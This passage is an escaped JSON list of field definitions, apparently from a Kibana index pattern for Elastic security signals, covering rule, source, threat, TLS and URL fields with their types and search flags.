"signal.original_event.module\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.original\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"signal.original_event.outcome\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.provider\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.risk_score\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.risk_score_norm\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.sequence\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.severity\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.start\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.timezone\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_time\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parent.depth\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parent.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parent.index\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parent.rule\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parent.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parents.depth\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parents.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parents.index\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parents.rule\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parents.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.author\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.building_block_type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.created_at\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.created_by\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.description\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.enabled\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.false_positives\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.from\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.immutable\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.index\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.interval\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.language\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.license\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.max_signals\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.note\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"signal.rule.output_index\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.query\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.references\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.risk_score\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.risk_score_mapping.field\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.risk_score_mapping.operator\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.risk_score_mapping.value\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.rule_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.rule_name_override\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.saved_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.severity\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.severity_mapping.field\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.severity_mapping.operator\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.severity_mapping.severity\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.severity_mapping.value\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.size\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.tags\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threat.framework\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threat.tactic.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threat.tactic.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threat.tactic.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threat.technique.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threat.technique.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threat.technique.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threshold.field\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threshold.value\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.timeline_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.timeline_title\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.timestamp_override\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.to\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.updated_at\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.updated_by\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.status\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.threshold_count\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.address\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.as.number\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.as.organization.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.as.organization.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"source.as.organization.name\"}}},{\"count\":0,\"name\":\"source.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.geo.city_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.geo.continent_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.geo.country_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.geo.country_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.geo.location\",\"type\":\"geo_point\",\"esTypes\":[\"geo_point\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.geo.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.geo.region_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.geo.region_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.mac\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.nat.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.nat.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.packets\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.registered_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.top_level_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.email\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.full_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.full_name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"source.user.full_name\"}}},{\"count\":0,\"name\":\"source.user.group.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.group.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.group.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"source.user.name\"}}},{\"count\":0,\"name\":\"tags\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.framework\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.tactic.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.tactic.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.tactic.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.technique.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.technique.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.technique.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"threat.technique.name\"}}},{\"count\":0,\"name\":\"threat.technique.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.cipher\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.certificate\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.certificate_chain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.hash.md5\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.hash.sha1\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.hash.sha256\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.issuer\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.ja3\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.not_after\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.not_before\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.server_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.subject\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.supported_ciphers\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.curve\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.established\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.next_protocol\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.resumed\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.certificate\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.certificate_chain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.hash.md5\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.hash.sha1\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.hash.sha256\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.issuer\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.ja3s\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.not_after\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.not_before\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.subject\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.version_protocol\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"trace.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"transaction.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.extension\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.fragment\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.full\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.full.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"url.full\"}}},{\"count\":0,\"name\":\"url.original\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.original.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"url.original\"}}},{\"count\":0,\"name\":\"url.password\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.path\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFrom